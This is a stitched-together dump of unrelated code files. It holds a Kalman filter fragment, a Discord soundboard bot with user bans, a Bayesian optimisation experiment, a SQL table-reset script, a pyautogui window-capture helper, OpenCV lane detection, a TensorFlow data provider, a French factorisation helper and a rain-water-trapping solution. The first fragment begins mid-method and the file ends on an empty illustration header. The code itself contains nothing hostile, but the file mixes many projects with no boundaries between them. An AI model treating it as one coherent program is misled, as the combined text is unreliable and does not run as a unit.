self.filter( self.theta, self.t[-self.filter_range:], self.u[-self.filter_range:] if self.u is not None else None, self.y[-self.filter_range:] ) self.results[0]['fit_time'] = time.time() - start_time def add_measurements(self, y, t, u=None): """ Updates the state of the Kalman Filter after measurements are added. """ super().add_measurements(y, t, u) _, _, self.m, self.P, self.mle = self.filter(self.theta, t, u, y) def predict(self, t, u=None): """ Predicts the forecast distribution parameters for the timestamps t, optionally given covariates u. 
""" if super().predict(t, u): return start_time = time.time() mu_y, sigma2_y, _, _, _ = self.filter(self.theta, t, u) self.mu_y = np.hstack([self.mu_y, mu_y]) self.sigma2_y = np.hstack([self.sigma2_y, sigma2_y]) # self.results[0]['mu_y'].append(mu_y.tolist()) # self.results[0]['sigma2_y'].append(sigma2_y.tolist()) self.results[0]['prediction_time'].append(time.time() - start_time) def get_mean(self, t): super().get_mean(t) idx = self.idx(t) return self.mean(self.mu_y[idx], self.sigma2_y[idx]) def get_var(self, t): super().get_var(t) idx = self.idx(t) return self.var(self.mu_y[idx], self.sigma2_y[idx]) def get_percentile(self, p, t): super().get_percentile(p, t) idx = self.idx(t) return self.percentile(p, self.mu_y[idx], self.sigma2_y[idx]) def get_pit(self, y_true, t): super().get_pit(y_true, t) idx = self.idx(t) return self.cdf(y_true, self.mu_y[idx], self.sigma2_y[idx]) def get_crps(self, y_true, t): super().get_crps(y_true, t) idx = self.idx(t) return self.crps(y_true, self.mu_y[idx], self.sigma2_y[idx])
import os import glob from datetime import datetime, timedelta import discord from discord.ext import commands import asyncio import json import aiosqlite from pydub import AudioSegment from token_discord import BOT_TOKEN import bot_config FILE_DIR = bot_config.FILE_DIR SOUND_PLAYER_DIR = bot_config.SOUND_PLAYER_DIR COMMAND_PREFIX = bot_config.COMMAND_PREFIX DEFAULT_BAN_DURATION = bot_config.DEFAULT_BAN_DURATION ERRORS = bot_config.SEND_ERROR_MESSAGES SWITCH = bot_config.ALLOW_SWITCH_CHANNELS ADMIN_ROLES = bot_config.ADMIN_ROLES client = discord.Client() #change the prefix for chatcommands, default = '.' bot = commands.Bot(command_prefix=COMMAND_PREFIX) #makes the bot join your voice channel, plays the sound and stays in channel @bot.command( help="Takes a soundname as a required argument and play count as an optional argument.\n\ Joins your voice channel(if not already connected) and plays the requested sound\n\ Use: .play (sound name) [play count]", brief="Play a sound" ) async def play(ctx, soundName : str, playCount=1): """ Joins the voice channel and plays the specified sound the specified number of times ctx: the context taken from the command in discord(automatically generated) soundName: the name of the sound to be played playCount : the number of times to play the sound(optional) returns : None """ if playCount > bot_config.MAX_PLAYCOUNT or await isBanned(ctx.guild.id, ctx.author.id): return await play_func(ctx, soundName, playCount = playCount) @bot.command( help="Stops the sound that is currently playing", brief="Stops the sound that is currently playing" ) async def stop(ctx): voiceClient = ctx.guild.voice_client if await isBanned(ctx.guild.id, ctx.author.id): if ERRORS: await ctx.send("Cannot use stop command because you are banned") return if not voiceClient: if ERRORS: await ctx.send('```Not connected to voice or you\'re not in the right channel```') return voiceClient.stop() @bot.command( help="Instantly makes the bot leave the channel you're currently in, stopping any sound that is being played", brief="Make the bot leave the voice channel" ) async def leave(ctx): voiceClient = ctx.guild.voice_client if await isBanned(ctx.guild.id, ctx.author.id): if ERRORS: await ctx.send("Cannot use leave command because you are banned") return if not voiceClient: if ERRORS: await ctx.send('```Not connected to voice or you\'re not in the right channel```') return await voiceClient.disconnect() # send a message with the list of available sounds to the channel @bot.command( help="Posts a list of all available sounds to the channel", brief="Posts a list of all available sounds to the channel" ) async def list(ctx): sound_list = await soundList() if 'output' in sound_list: sound_list.remove('output') ret_string = '```List of Sounds:\n\n'+ '\n'.join(sound_list)+'```' await ctx.send(ret_string) @bot.command( help=f"Bans a member of the guild of the text channel the command is sent to.\ Takes the name of the user to be banned as a required argument, the duration(in days, accepts fractional days like 0.5) and the reason\ as optional arguments.\nIf you want to add a reason you must also add the duration. 
The default ban time is set to {DEFAULT_BAN_DURATION} days\ Banned users can still continue as normal on the server but they cannot use the bot's play and leave commands\n\ Only admins and users with the correct role can use this command.\n\ For optimal results add the discriminator(the #1234 part) of the user to ban to avoid banning innocent users with the same name.\n\ Use: .ban (username) [duration] [reason]", brief="Bans a user from using the bots core features" ) async def ban(ctx, user_to_ban_name: str, ban_time=DEFAULT_BAN_DURATION, reason="Unspecified"): if not await has_admin_rights(ctx): if ERRORS: await ctx.send("```You are not authorised to ban people. Only the admin and selected members can perform this action.```") return user_id = await get_id_from_name(ctx, user_to_ban_name) if user_id is None: return guild_id = ctx.guild.id unban_time = await calc_time_after_timedelta(ban_time) if await isBanned(guild_id, user_id): if ERRORS: await ctx.send(f"```{user_to_ban_name} is already banned```") return async with aiosqlite.connect('banned.db') as db: await db.execute("INSERT INTO banned_users VALUES (?,?,?,?)", (user_id, guild_id, unban_time, reason)) await db.commit() await ctx.send(f"```User {user_to_ban_name} banned for {ban_time} days.```") @bot.command( help="Unbans a member of the guild of the text channel the command is sent to.\n\ Takes the name of the user to be unbanned as a required argument.\n\ Only admins and users with the correct role can use this command.\n\ For optimal results add the discriminator(the #1234 part) of the user to ban to avoid banning innocent users with the same name.\n\ Use: .unban (username)", brief="Unbans the specified user allowing them to use the bot again" ) async def unban(ctx, user_to_unban_name: str): if not await has_admin_rights(ctx): if ERRORS: await ctx.send("```You are not authorised to unban people. Only the admin and selected members can perform this action.```") return guild_id = ctx.guild.id user_id = await get_id_from_name(ctx, user_to_unban_name) if user_id is None: if ERRORS: await ctx.send(f"```Could not find user {user_to_unban_name}. This command is case sensitive and the name must match exactly.```") return if not await isBanned(guild_id, user_id): if ERRORS: await ctx.send(f"```{user_to_unban_name} is not banned. This command is case sensitive and the name must match exactly.```") return async with aiosqlite.connect('banned.db') as db: del_query = "DELETE FROM banned_users WHERE guild_id = ? AND user_id = ?" await db.execute(del_query, (guild_id, user_id)) await db.commit() await ctx.send(f"```{user_to_unban_name} has been unbanned```") # get the ban status of a user (named) @bot.command( help="Checks the status of the ban of the specified user\n\ Shows the remaining time of the ban and the reason for the ban\n\ Use: .banStatus (username)", brief="Check the ban status of a user" ) async def banStatus(ctx, user_name: str): user_id = await get_id_from_name(ctx, user_name) if not user_id: if ERRORS: await ctx.send(f"```Could not find user {user_name}. This command is case sensitive and the name must match exactly.```") return if not await isBanned(ctx.guild.id, user_id): await ctx.send("```Status:\nNot Banned```") return else: async with aiosqlite.connect('banned.db') as db: query = "SELECT * FROM banned_users WHERE guild_id = ? AND user_id = ?" 
cursor = await db.execute(query, (ctx.guild.id, user_id)) user_info = await cursor.fetchone() unban_time, reason = user_info[2:] t = unban_time - int(datetime.now().timestamp()) td = timedelta(seconds=t) days = td.days seconds = td.seconds hours, minutes, seconds = await convert_seconds(seconds) time_string = f"{days} days {hours} hours {minutes} minutes {seconds} seconds" await ctx.send(f"```Status:\nBanned\n\nTime until unban:\n{time_string}\n\nReason:\n{reason}```") async def has_admin_rights(ctx): isAdmin = ctx.author == ctx.guild.owner hasRole = any(role.name.lower() in [admin_role.lower() for admin_role in ADMIN_ROLES] for role in ctx.author.roles) return isAdmin or hasRole # gets the list of all the mp3 files in the file directory # Sounds folder needs to exist, otherwise this crashes async def soundList(): try: soundList = glob.glob(FILE_DIR + '/*.mp3') except: soundList = [] adjustedNamesList = [sound[len(FILE_DIR) + 1:-4] for sound in soundList] return adjustedNamesList async def get_id_from_name(ctx, name: str): member_object = ctx.guild.get_member_named(name) if not member_object: if ERRORS: await ctx.send(f"```User {name} was not found. This command is case sensitive and the name must match exactly```") return None return member_object.id async def calc_time_after_timedelta(days): td = timedelta(days=days) now = datetime.now() datetime_after_timedelta = now + td return int(datetime_after_timedelta.timestamp()) async def convert_seconds(seconds): hours = seconds // 3600 seconds %= 3600 minutes = seconds // 60 seconds %= 60 return (hours, minutes, seconds) async def isBanned(guild_id, user_id): async with aiosqlite.connect('banned.db') as db: query = "SELECT unban_time FROM banned_users WHERE guild_id = ? AND user_id = ?" async with db.execute(query, (guild_id, user_id)) as cursor: result = await cursor.fetchone() if not result: return False # ban has expired elif datetime.now().timestamp() >= result[0]: query = "DELETE FROM banned_users WHERE guild_id = ? AND user_id = ?" await db.execute(query, (guild_id, user_id)) await db.commit() return False else: return True async def getVoiceClient(ctx): user_voice = ctx.author.voice bot_voice = ctx.guild.voice_client # user is in voice channel if user_voice: # there is no established connection to voice channel for the bot if not bot_voice: voice_client = await user_voice.channel.connect() # bot and user are not connected to the same voice channel elif user_voice.channel.id != bot_voice.channel.id: # if the bot is set to switch channels when needed if SWITCH: await bot_voice.disconnect() voice_client = await user_voice.channel.connect() # bot is not allowed to switch and we should return None to indicate we cannot connect else: voice_client = None # the bot is connected to the same channel as the user else: voice_client = bot_voice else: voice_client = None return voice_client async def play_func(ctx, soundName: str, playCount = 1): """ Joins the voice channel and plays the specified sound the specified number of times ctx: the context taken from the command in discord(automatically generated) soundName: the name of the sound to be played playCount : the number of times to play the sound(optional) returns : None """ playCount = int(playCount) if playCount > bot_config.MAX_PLAYCOUNT: if ERRORS: await ctx.send(f"```Please do not spam. 
The maximum amount of plays is set to {bot_config.MAX_PLAYCOUNT}```") SoundList = await soundList() if soundName not in SoundList: if ERRORS: await ctx.send(f'```Couldn\'t find a sound named {soundName} in your \'Sounds\'-folder```') return # get voiceclient before writing to file to check if bot is already playing from file # otherwise we can't queue sounds because we'd have to allow allow writing to files being played voiceClient = await getVoiceClient(ctx) if not voiceClient: err_msg = '```Error, you might not be connected to a voice channel or you are in a different channel and the bot is set to not switch```' if ERRORS: await ctx.send(err_msg) return # wait while bot is playing another sound # allows for queuing of sounds while voiceClient.is_playing(): await asyncio.sleep(0.1) soundName = FILE_DIR + "/" + soundName + '.mp3' # pydub audio manipulation to repeat sound multiple times sound = AudioSegment.from_mp3(soundName) multiplied_sound = sound * playCount multiplied_sound.export(FILE_DIR + "/output.mp3", format="mp3") #create a new playable audiosource from the soundfile audioSource = discord.FFmpegPCMAudio( FILE_DIR+"/output.mp3", executable = SOUND_PLAYER_DIR ) #get the voiceClient voiceClient.play(audioSource) return None @bot.command() async def roles(ctx): await ctx.send(ctx.author.roles) async def init_db(): db = await aiosqlite.connect('banned.db') await db.execute('CREATE TABLE IF NOT EXISTS banned_users (user_id, guild_id, unban_time, reason)') await db.commit() return AudioSegment.ffmpeg = SOUND_PLAYER_DIR asyncio.run(init_db()) bot.run(BOT_TOKEN)
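# --- Illustration: the ban-timestamp arithmetic behind ban/banStatus ---
# A minimal sketch of how a fractional-day ban duration becomes a unix unban timestamp
# and how the remaining time is split back into days/hours/minutes/seconds, mirroring
# calc_time_after_timedelta and convert_seconds above (plain functions, no Discord or
# database needed).
from datetime import datetime, timedelta

def unban_timestamp(days):
    return int((datetime.now() + timedelta(days=days)).timestamp())

def split_seconds(seconds):
    hours, seconds = divmod(seconds, 3600)
    minutes, seconds = divmod(seconds, 60)
    return hours, minutes, seconds

unban_at = unban_timestamp(0.5)                        # a half-day ban
remaining = unban_at - int(datetime.now().timestamp())
td = timedelta(seconds=remaining)
print(td.days, *split_seconds(td.seconds))             # roughly 0 days, 11-12 hours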
import sys sys.path.insert(0,'..') sys.path.insert(0,'../..') from bayes_opt import BayesOpt,BayesOpt_KnownOptimumValue import numpy as np #from bayes_opt import auxiliary_functions from bayes_opt import functions from bayes_opt import utilities import warnings #from bayes_opt import acquisition_maximization import sys import itertools import matplotlib.pyplot as plt np.random.seed(6789) warnings.filterwarnings("ignore") counter = 0 myfunction_list=[] #myfunction_list.append(functions.sincos()) #myfunction_list.append(functions.branin()) #myfunction_list.append(functions.hartman_3d()) #myfunction_list.append(functions.ackley(input_dim=5)) myfunction_list.append(functions.alpine1(input_dim=5)) #myfunction_list.append(functions.hartman_6d()) #myfunction_list.append(functions.gSobol(a=np.array([1,1,1,1,1]))) #myfunction_list.append(functions.gSobol(a=np.array([1,1,1,1,1,1,1,1,1,1]))) acq_type_list=[] temp={} temp['name']='erm' # expected regret minimization temp['IsTGP']=0 # recommended to use tgp for ERM acq_type_list.append(temp) temp={} temp['name']='cbm' # confidence bound minimization temp['IsTGP']=1 # recommended to use tgp for CBM #acq_type_list.append(temp) #temp={} #temp['name']='kov_mes' # MES+f* #temp['IsTGP']=0 # we can try 'tgp' #acq_type_list.append(temp) temp={} temp['name']='kov_ei' # this is EI + f* temp['IsTGP']=0 # we can try 'tgp' by setting it =1 #acq_type_list.append(temp) temp={} temp['name']='ucb' # vanilla UCB temp['IsTGP']=0 # we can try 'tgp' by setting it =1 #acq_type_list.append(temp) temp={} temp['name']='ei' # vanilla EI temp['IsTGP']=0 # we can try 'tgp' by setting it =1 #acq_type_list.append(temp) temp={} temp['name']='random' # vanilla EI temp['IsTGP']=0 # we can try 'tgp' by setting it =1 #acq_type_list.append(temp) fig=plt.figure() color_list=['r','b','k','m','c','g','o'] marker_list=['s','x','o','v','^','>','<'] for idx, (myfunction,acq_type,) in enumerate(itertools.product(myfunction_list,acq_type_list)): print("=====================func:",myfunction.name) print("==================acquisition type",acq_type) IsTGP=acq_type['IsTGP'] acq_name=acq_type['name'] nRepeat=10 ybest=[0]*nRepeat MyTime=[0]*nRepeat MyOptTime=[0]*nRepeat marker=[0]*nRepeat bo=[0]*nRepeat [0]*nRepeat for ii in range(nRepeat): if 'kov' in acq_name or acq_name == 'erm' or acq_name == 'cbm': bo[ii]=BayesOpt_KnownOptimumValue(myfunction.func,myfunction.bounds,myfunction.fstar, \ acq_name,IsTGP,verbose=1) else: bo[ii]=BayesOpt(myfunction.func,myfunction.bounds,acq_name,verbose=1) ybest[ii],MyTime[ii]=utilities.run_experiment(bo[ii],n_init=3*myfunction.input_dim,\ NN=10*myfunction.input_dim,runid=ii) MyOptTime[ii]=bo[ii].time_opt print("ii={} BFV={:.3f}".format(ii,myfunction.ismax*np.max(ybest[ii]))) Score={} Score["ybest"]=ybest Score["MyTime"]=MyTime Score["MyOptTime"]=MyOptTime utilities.print_result_sequential(bo,myfunction,Score,acq_type) ## plot the result # process the result y_best_sofar=[0]*len(bo) for uu,mybo in enumerate(bo): y_best_sofar[uu]=[ (myfunction.fstar - np.max(mybo.Y_ori[:ii+1]) ) for ii in range(len(mybo.Y_ori))] y_best_sofar[uu]=y_best_sofar[uu][3*myfunction.input_dim:] # remove the random phase for plotting purpose y_best_sofar=np.asarray(y_best_sofar) myxaxis=range(y_best_sofar.shape[1]) plt.errorbar(myxaxis,np.mean(y_best_sofar,axis=0), np.std(y_best_sofar,axis=0)/np.sqrt(nRepeat), label=acq_type['name'],color=color_list[idx],marker=marker_list[idx]) plt.ylabel("Simple Regret",fontsize=14) plt.xlabel("Iterations",fontsize=14) plt.legend(prop={'size': 14}) 
strTitle="{:s} D={:d}".format(myfunction.name,myfunction.input_dim) plt.title(strTitle,fontsize=18)
delete from ces_policies ; delete from ces_policy_identity ; delete from host_policies ; delete from host_policy_identity ; delete from host_ids ; delete from firewall_policies ; delete from host_policy_ts ; ALTER TABLE ces_policies AUTO_INCREMENT = 1; ALTER TABLE ces_policy_identity AUTO_INCREMENT = 1; ALTER TABLE host_policies AUTO_INCREMENT = 1; ALTER TABLE host_policy_identity AUTO_INCREMENT = 1; ALTER TABLE host_ids AUTO_INCREMENT = 1; ALTER TABLE firewall_policies AUTO_INCREMENT = 1; ALTER TABLE host_policy_ts AUTO_INCREMENT = 1; use ces_bootstrap; delete from bootstrap; ALTER TABLE bootstrap AUTO_INCREMENT = 1;
import time import pyautogui import subprocess import re def xwininfo_output(name): output = subprocess.run(["xwininfo", "-name", name], stdout=subprocess.PIPE).stdout output = output.decode('ascii') return output def extract_dims(output): mo = re.search(' Absolute upper-left X: (\d+)', output) x = int(mo.group(1)) mo = re.search(' Absolute upper-left Y: (\d+)', output) y = int(mo.group(1)) mo = re.search(' Width: (\d+)', output) w = int(mo.group(1)) mo = re.search(' Height: (\d+)', output) h = int(mo.group(1)) return x, y, w, h def get_xwin_dims(name): output = xwininfo_output(name) return extract_dims(output) def capture_window(x, y, w, h, h_nc): im = pyautogui.screenshot(region=(x, y + h_nc, w, h - h_nc)) return im if __name__ == '__main__': time.sleep(5) x, y, w, h = get_xwin_dims('Freecell') # x, y, w, h = get_xwin_dims('Sudoku') print(x, y, w, h) # pyautogui.mouseDown(1360, 670) # pyautogui.moveTo(1360, 670) # pyautogui.dragTo(220, 330, duration=0.5) # pyautogui.mouseUp(220, 330, duration=0.5) # where = pyautogui.locateOnScreen('/home/splendor/Pictures/freecell-new.png') # print(where) # where = pyautogui.center(where) # print(where) # pyautogui.click(where) # pyautogui.click() # distance = 200 # while distance > 0: # pyautogui.dragRel(distance, 0, duration=0.2) # distance = distance - 5 # pyautogui.dragRel(0, distance, duration=0.2) # pyautogui.dragRel(-distance, 0, duration=0.2) # distance = distance - 5 # pyautogui.dragRel(0, -distance, duration=0.2) # print('Press Ctrl-C to quit.') # try: # while True: # x, y = pyautogui.position() # positionStr = 'X: ' + str(x).rjust(4) + ' Y: ' + str(y).rjust(4) # print(positionStr, end='') # print('\b' * len(positionStr), end='', flush=True) # except KeyboardInterrupt: # print('\nDone.')
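# --- Illustration: what extract_dims expects from xwininfo ---
# A synthetic xwininfo-style snippet (made up, but shaped to match the regexes above)
# and the geometry tuple extract_dims pulls out of it. Assumes the extract_dims
# function defined above is in scope.
sample_output = """
xwininfo: Window id: 0x3a00007 "Freecell"

  Absolute upper-left X: 64
  Absolute upper-left Y: 27
  Width: 800
  Height: 600
"""

print(extract_dims(sample_output))  # (64, 27, 800, 600)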
import matplotlib.pylab as plt
import cv2
import numpy as np
import math


def region_of_interest(img, vertices):
    mask = np.zeros_like(img)
    #channel_count = img.shape[2]
    match_mask_color = 255
    cv2.fillPoly(mask, vertices, match_mask_color)
    masked_image = cv2.bitwise_and(img, mask)
    return masked_image


def mediumVal(spot):
    # Average the four line coordinates; returns True as a sentinel when the
    # mean is NaN (i.e. no line segments were collected for this side).
    result = []
    for i in range(4):
        spots = []
        for line in spot:
            spots.append(line[i])
        array = np.array(spots)
        if math.isnan(array.mean()):
            return True
        else:
            result.append(int(array.mean()))
    return result


def draw_the_lines(img, lines, width):
    if lines is None:  # comparing type(lines) to the string 'NoneType' never matched; check None directly
        return img
    img = np.copy(img)
    blank_image = np.zeros((img.shape[0], img.shape[1], 3), dtype=np.uint8)
    left_spot = []
    right_spot = []
    for line in lines:
        for x1, y1, x2, y2 in line:
            if x1 < width / 2:
                left_spot.append((x1, y1, x2, y2))
            else:
                right_spot.append((x1, y1, x2, y2))
    left_line = mediumVal(left_spot)
    right_line = mediumVal(right_spot)
    slope = []
    if left_line != True:
        x1, y1, x2, y2 = left_line
        if x2 - x1 != 0:
            slope.append((y2 - y1) / (x2 - x1))
        cv2.line(blank_image, (x1, y1), (x2, y2), (0, 255, 0), thickness=10)
    if right_line != True:
        x1, y1, x2, y2 = right_line
        if x2 - x1 != 0:
            slope.append((y2 - y1) / (x2 - x1))
        cv2.line(blank_image, (x1, y1), (x2, y2), (0, 255, 0), thickness=10)
    text = "Go Straight"
    if slope:  # guard: slope can be empty when no usable line was found
        if slope[0] > 0:
            text = "Right"
        elif slope[0] < 0:
            text = "Left"
    org = (50, 100)
    font = cv2.FONT_HERSHEY_SIMPLEX
    cv2.putText(img, text, org, font, 1, (255, 0, 0), 2)
    img = cv2.addWeighted(img, 0.8, blank_image, 1, 0.0)
    return img


#image = cv2.imread('road.jpg')
#image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)

def process(image):
    height = image.shape[0]
    width = image.shape[1]
    region_of_interest_vertices = [(0, height), (0, height / 2),
                                   (width, height / 2), (width, height)]
    gray_image = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)
    canny_image = cv2.Canny(gray_image, 50, 150)
    cropped_image = region_of_interest(
        canny_image,
        np.array([region_of_interest_vertices], np.int32),
    )
    lines = cv2.HoughLinesP(
        cropped_image,
        # smaller rho/theta = more accurate, longer processing time
        rho=6,  # number of pixels
        theta=np.pi / 60,
        threshold=160,
        lines=np.array([]),
        minLineLength=40,
        maxLineGap=25)
    if lines is None:  # the string comparison with "NoneType" was dropped; the None check is enough
        return image
    image_with_lines = draw_the_lines(image, lines, width)
    return image_with_lines


cap = cv2.VideoCapture(1)

while True:
    ret, frame = cap.read()
    if ret:
        frame = process(frame)
        cv2.imshow('frame', frame)
        if cv2.waitKey(1) & 0xFF == ord('q'):
            break
    else:
        break

cap.release()
cv2.destroyAllWindows()
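# --- Illustration: how region_of_interest masks the edge image ---
# A tiny self-contained example of the masking step above: fillPoly paints the polygon
# white in a black mask, and bitwise_and keeps only the input pixels inside it.
# The 6x6 "edge image" and polygon are made up for illustration.
import numpy as np
import cv2

img = np.full((6, 6), 50, dtype=np.uint8)  # pretend edge image, all 50s
vertices = np.array([[(0, 5), (0, 3), (5, 3), (5, 5)]], np.int32)  # bottom band, (x, y) points

mask = np.zeros_like(img)
cv2.fillPoly(mask, vertices, 255)
masked = cv2.bitwise_and(img, mask)

print(masked)  # 50s only in the bottom rows covered by the polygon, 0 elsewhere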
import numpy as np import tensorflow as tf from random import choice,shuffle #g_ps = [] #s_ps = [] #for g in glob.glob('../data/training_set/ffp10_p/*.npy'): # g_ps.append(np.load(g)) #g_ps = np.array(g_ps) #print 'g_ps.shape:',g_ps.shape #for s in glob.glob('../data/training_set/string_p/*.npy'): # s_ps.append(np.load(s)) #s_ps = np.array(s_ps) #print 's_ps.shape:' , s_ps.shape #def dp(n): # l = 200 # x = [] # y = [] # for i in range(n): # gm = np.random.uniform(10,1000) # gm = gm* 1e-7 # # r1 = np.random.randint(0,len(g_ps)) # ri,rj = np.random.randint(0,2048-l,2) # r2 = np.random.randint(0,len(s_ps)) # ri,rj = np.random.randint(0,2048-l,2) # # gp = g_ps[r1][ri:ri+l,rj:rj+l] # sp = s_ps[r2][ri:ri+l,rj:rj+l] # x.append(gp+gm*sp) # y.append(-np.log(gm)) # return np.expand_dims(np.array(x) , -1) , np.expand_dims(np.array(y) , -1) def get_slice(data,nx,ny): """Slice matrix in x and y direction""" lx,ly = data.shape if nx==0 or nx==lx: slx = slice(0, lx) else: idx = np.random.randint(0, lx - nx) slx = slice(idx, (idx+nx)) if ny==0 or ny==ly: sly = slice(0, ly) else: idy = np.random.randint(0, ly - ny) sly = slice(idy, (idy+ny)) return slx, sly class DataProvider(object): def __init__(self,n_files,s_files,gmus, nx=0,ny=0,n_buffer=10, reload_rate=100,filt=None): self.n_files = n_files self.s_files = s_files nmin = min(len(n_files),len(s_files)) if n_buffer>= nmin: n_buffer = nmin self.reload_rate = 0 else: self.reload_rate = reload_rate self.nx,self.ny = nx,ny self.n_buffer = n_buffer self.gmus = gmus if filt is None: def filt(x): return x self.filt = filt self.counter = 0 self.reload() def reload(self): print('Data provider is reloading...') self.n_set = [] self.s_set = [] # self.d_set = [] ninds = np.arange(len(self.n_files)) sinds = np.arange(len(self.s_files)) shuffle(ninds) shuffle(sinds) for i in range(self.n_buffer): filen = self.n_files[ninds[i]] files = self.s_files[sinds[i]] self.n_set.append(np.load(filen)) signal = np.load(files) self.s_set.append(signal) # if self.filt: # self.d_set.append(self.filt(signal)) # else: # self.d_set.append(signal) # def get_data(self): self.counter += 1 if self.reload_rate: if self.counter%self.reload_rate==0: self.reload() n = choice(self.n_set) sind = choice(np.arange(self.n_buffer)) s = self.s_set[sind] # d = self.d_set[sind] return n,s#,d def pre_process(self, n, s, gmu): nslice = get_slice(n,self.nx,self.ny) n = n[nslice] sslice = get_slice(s,self.nx,self.ny) s = s[sslice] sn = n + gmu*s sn = self.filt(sn) # d = d[sslice] sn = np.expand_dims(sn,-1) # d = np.expand_dims(d,-1) return sn#,d def __call__(self, n, gmus=None): if gmus is None: gmus = self.gmus n_class = len(gmus) # x,y = self.get_data() X = [] Y = [] for i in range(n): n,s = self.get_data() inds = np.arange(n_class) shuffle(inds) gmu = gmus[inds[0]] # gmu = choice(gmus) sn = self.pre_process(n,s,gmu) # rand = np.random.randint(0,2) # sn = sn-sn+rand X.append(sn) # Y.append(-np.log10(gmu+1e-30)) lbl = n_class*[0] lbl[inds[0]] = 1 Y.append(lbl) X = np.array(X) Y = np.array(Y) # def __call__(self, n, gmus=None): # rp = np.random.uniform(0,1) # # if gmus is None: # gmus = self.gmus ## x,y = self.get_data() # X = [] # Y = [] # for i in range(n): # n,s = self.get_data() # gmu = choice(gmus) # sn = self.pre_process(n,s,gmu) # rand = int(np.random.uniform(0,1)>rp) # sn = sn-sn+rand # X.append(sn) ## Y.append(-np.log10(gmu+1e-30)) # lbl = [0,0] # lbl[rand] = 1 # Y.append(lbl) # # X = np.array(X) # Y = np.array(Y) return X,Y #fig,ax=plt.subplots(1,1,figsize=(5,5)) 
#ax.imshow(x[0,:,:,0],norm=LogNorm(),cmap=plt.get_cmap('jet')) #plt.title('G + Gu*S') #plt.savefig('x_lognorm ') #fig,ax=plt.subplots(1,1,figsize=(5,5)) #ax.imshow(x[0,:,:,0]) #plt.title('G + Gu*S') #plt.savefig('x') #print(x.shape,y.shape) #exit() #l = 200 #nx,ny,n_channel = l,l,1 def arch_t(x_in): print("\033[91m ============== Begin ============== \033[0m") x1 = tf.layers.conv2d(x_in,filters=36,kernel_size=3, strides=(1, 1),padding='same',activation=tf.nn.relu) print(x1) x2 = tf.layers.average_pooling2d(x1,pool_size=2,strides=2) print(x2) x2 = tf.layers.conv2d(x2,filters=36,kernel_size=3, strides=(2, 2),padding='same',activation=tf.nn.relu) print(x2) x3 = tf.layers.average_pooling2d(x2,pool_size=2,strides=2) print(x3) x3 = tf.layers.conv2d(x3,filters=36,kernel_size=3, strides=(2, 2),padding='same',activation=tf.nn.relu) print(x3) x4 = tf.layers.average_pooling2d(x3,pool_size=3,strides=2) print(x4) x4 = tf.layers.conv2d(x4,filters=36,kernel_size=3,strides=(2, 2),padding='same', activation=tf.nn.relu) print(x4) #x5 = tf.layers.average_pooling2d(x4,pool_size=2,strides=2) x5 = tf.layers.conv2d(x4,filters=36,kernel_size=3,strides=(2, 2),padding='same', activation=tf.nn.relu) print(x5) #x5 = tf.layers.average_pooling2d(x5,pool_size=2,strides=2) #x5 = tf.layers.conv2d(x5,filters=36,kernel_size=3,strides=(2, 2),padding='same', #activation=tf.nn.relu) #x5 = tf.layers.average_pooling2d(x5,pool_size=2,strides=2) x7 = tf.contrib.layers.flatten(x5) x7 = tf.nn.dropout( x7, keep_prob=0.6) print(x7) x7 = tf.layers.dense(x7, 10 , activation=tf.nn.relu) print(x7) y_out = tf.layers.dense(x7, 1 , activation=tf.nn.relu) print(y_out) print("\033[91m =============== END =============== \033[0m") return y_out def arch_maker(x,n_conv,n_class): #x_in = tf.placeholder(tf.float32,[None,nx,ny,n_channel]) #y_true = tf.placeholder(tf.float32,[None , n_channel]) #learning_rate = tf.placeholder(tf.float32) print("\033[91m ============== Begin ============== \033[0m") # for _ in range(n_conv): # x = tf.layers.conv2d(x,filters=16,kernel_size=5, # strides=(1, 1),padding='same') # print(x) # x = tf.layers.batch_normalization(x) # print(x) # x = tf.nn.relu(x) # print(x) for _ in range(n_conv): x = tf.layers.conv2d(x,filters=4,kernel_size=3, strides=(1, 1),padding='same') print(x) x = tf.layers.batch_normalization(x) print(x) x = tf.nn.relu(x) print(x) x = tf.layers.average_pooling2d(x,pool_size=2,strides=2) print(x) x = tf.contrib.layers.flatten(x) print(x) x = tf.nn.dropout( x, keep_prob=0.6) print(x) x = tf.layers.dense(x, 20 , activation=tf.nn.relu) print(x) #x = tf.layers.dense(x, 20 , activation=tf.nn.softmax) #print(x) y = tf.layers.dense(x, n_class, activation=tf.nn.softmax) print(y) print("\033[91m =============== END =============== \033[0m") return y
# -*- coding: utf-8 -*-
"""
Created on Mon Jun 24 20:59:54 2019

@author: TRAORE Cheick Amed
"""
#import time
import FACTORISATION as ft
#from prime import erastothene

#d=time.time()
def maillage(Nl,Nc):
    # Mesh ("maillage") helper: for the row count Nl and the column count Nc, record
    # whether each count is prime (ft.erastothene, cf. the commented
    # `from prime import erastothene`) and factorise it with ft.factorisation;
    # if the count is prime, factorise count-1 instead.
    # Returns (list of factorisations, list of primality flags).
    tab,tabool=[],[]
    tabool+=[ft.erastothene(Nl)]
    if tabool[0]:
        tab+=[ft.factorisation(Nl-1)]
    else:
        tab+=[ft.factorisation(Nl)]
    tabool+=[ft.erastothene(Nc)]
    if tabool[1]:
        tab+=[ft.factorisation(Nc-1)]
    else:
        tab+=[ft.factorisation(Nc)]
    return tab,tabool
#f=time.time()
#print('time {}'.format(f-d))
#print('time ',f-d)
class Solution(object):
    def trap(self, height):
        """
        :type height: List[int]
        :rtype: int
        """
        # ## normal way
        # res=0
        # # From left to right, assuming there exists a higher or same level further on.
        # # Keep the water in temp until we verify that.
        # t=0
        # i=0
        # j=0
        # while j<len(height):
        #     if height[j]<height[i]:
        #         t+=height[i]-height[j]
        #     else:
        #         res+=t
        #         t=0
        #         i=j
        #     j+=1
        # # Now i indicates the highest bar. We reverse the remaining part of the bars and do the same thing.
        # height=height[i:][::-1]
        # t=0
        # i=0
        # j=0
        # while j<len(height):
        #     if height[j]<height[i]:
        #         t+=height[i]-height[j]
        #     else:
        #         res+=t
        #         t=0
        #         i=j
        #     j+=1
        # return res

        ## another way
        if not height:
            return 0
        i = 0
        j = len(height) - 1
        # Two pointers i (left) and j (right). `lower` is the running maximum of
        # min(height[i], height[j]); it never decreases and is the water level the
        # walls seen so far can support. At each step the shorter side fills up to
        # `lower`, so add lower - height[side] and move that pointer inward,
        # repeating until i > j.
        res = 0
        lower = 0
        while i <= j:
            h = min(height[i], height[j])
            if h > lower:
                lower = h
            if height[i] <= height[j]:
                res += lower - height[i]
                i += 1
            else:
                res += lower - height[j]
                j -= 1
        return res
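# --- Illustration: worked examples for the two-pointer version of trap ---
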